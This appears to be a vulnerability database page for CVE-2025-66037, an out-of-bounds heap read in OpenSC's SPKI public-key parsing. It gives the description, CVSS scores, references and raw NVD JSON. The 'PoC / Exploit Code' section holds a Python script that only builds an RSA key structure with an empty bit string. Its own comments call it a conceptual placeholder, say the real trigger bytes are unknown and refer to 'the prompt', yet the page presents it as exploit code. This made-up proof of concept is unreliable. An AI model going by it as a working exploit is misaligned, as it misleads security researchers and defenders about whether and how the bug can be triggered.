CVE-2025-66037

Description

OpenSC is an open source smart card tools and middleware. Prior to version 0.27.0, feeding a crafted input to the fuzz_pkcs15_reader harness causes OpenSC to perform an out-of-bounds heap read in the X.509/SPKI handling path. Specifically, sc_pkcs15_pubkey_from_spki_fields() allocates a zero-length buffer and then reads one byte past the end of that allocation. This issue has been patched in version 0.27.0.

CVSS Details

CVSS Score

3.9

Severity

LOW

CVSS Vector

CVSS:3.1/AV:P/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:opensc_project:opensc:*:*:*:*:*:*:*:* - VULNERABLE

OpenSC < 0.27.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import binascii
from asn1crypto import keys, core

# Proof of Concept for CVE-2025-66037
# This script constructs a malformed SPKI structure that may trigger the OOB read.
# Note: Actual exploitation requires a smart card reader environment using OpenSC library.

def build_malformed_spki():
    # Attempt to construct a SPKI with specific parameters that might confuse the parser
    # The bug involves zero-length allocation leading to a read past the end.
    # We simulate a public key info structure with potentially problematic bit strings.
    
    # This is a conceptual representation. Real trigger requires specific DER bytes.
    # Usually involves manipulating the BIT STRING length in the public key structure.
    
    # Example DER sequence (Conceptual):
    # SEQUENCE {
    #   SEQUENCE { ... AlgorithmIdentifier ... }
    #   BIT STRING { ... } <-- Malformed length here
    # }
    
    # Since the exact bytes aren't public in the prompt, we generate a placeholder 
    # that represents the structure type causing the crash.
    
    algorithm_identifier = keys.AlgorithmIdentifier({'algorithm': 'rsa'})
    # Creating a potentially empty or malformed bit string
    malformed_bitstring = core.BitString(b'') 
    
    spki = keys.PublicKeyInfo({
        'algorithm': algorithm_identifier,
        'public_key': malformed_bitstring
    })
    
    return spki.dump()

if __name__ == "__main__":
    poc_data = build_malformed_spki()
    print(f"Generated PoC DER data length: {len(poc_data)}")
    print(f"Hex dump: {binascii.hexlify(poc_data).decode('utf-8')}")
    print("This data should be fed to the fuzz_pkcs15_reader harness or a card.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-66037
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-66037
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-66037/
[4] VulDB https://vuldb.com/cve/CVE-2025-66037
[5] https://github.com/OpenSC/OpenSC/security/advisories/GHSA-m58q-rmjm-mmfx
[6] https://github.com/OpenSC/OpenSC/wiki/CVE-2025-66037

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-66037", "sourceIdentifier": "[email protected]", "published": "2026-03-30T18:16:18.007", "lastModified": "2026-04-01T17:59:35.773", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenSC is an open source smart card tools and middleware. Prior to version 0.27.0, feeding a crafted input to the fuzz_pkcs15_reader harness causes OpenSC to perform an out-of-bounds heap read in the X.509/SPKI handling path. Specifically, sc_pkcs15_pubkey_from_spki_fields() allocates a zero-length buffer and then reads one byte past the end of that allocation. This issue has been patched in version 0.27.0."}, {"lang": "es", "value": "OpenSC es un conjunto de herramientas y middleware de código abierto para tarjetas inteligentes. Antes de la versión 0.27.0, al introducir una entrada manipulada en el arnés fuzz_pkcs15_reader, OpenSC realiza una lectura de pila fuera de límites en la ruta de manejo de X.509/SPKI. Específicamente, sc_pkcs15_pubkey_from_spki_fields() asigna un búfer de longitud cero y luego lee un byte más allá del final de esa asignación. Este problema ha sido parcheado en la versión 0.27.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 3.9, "baseSeverity": "LOW", "attackVector": "PHYSICAL", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 0.5, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:opensc_project:opensc:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.27.0", "matchCriteriaId": "D890677F-5379-4587-B8E7-D38B02AD525A"}]}]}], "references": [{"url": "https://github.com/OpenSC/OpenSC/security/advisories/GHSA-m58q-rmjm-mmfx", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/OpenSC/OpenSC/wiki/CVE-2025-66037", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}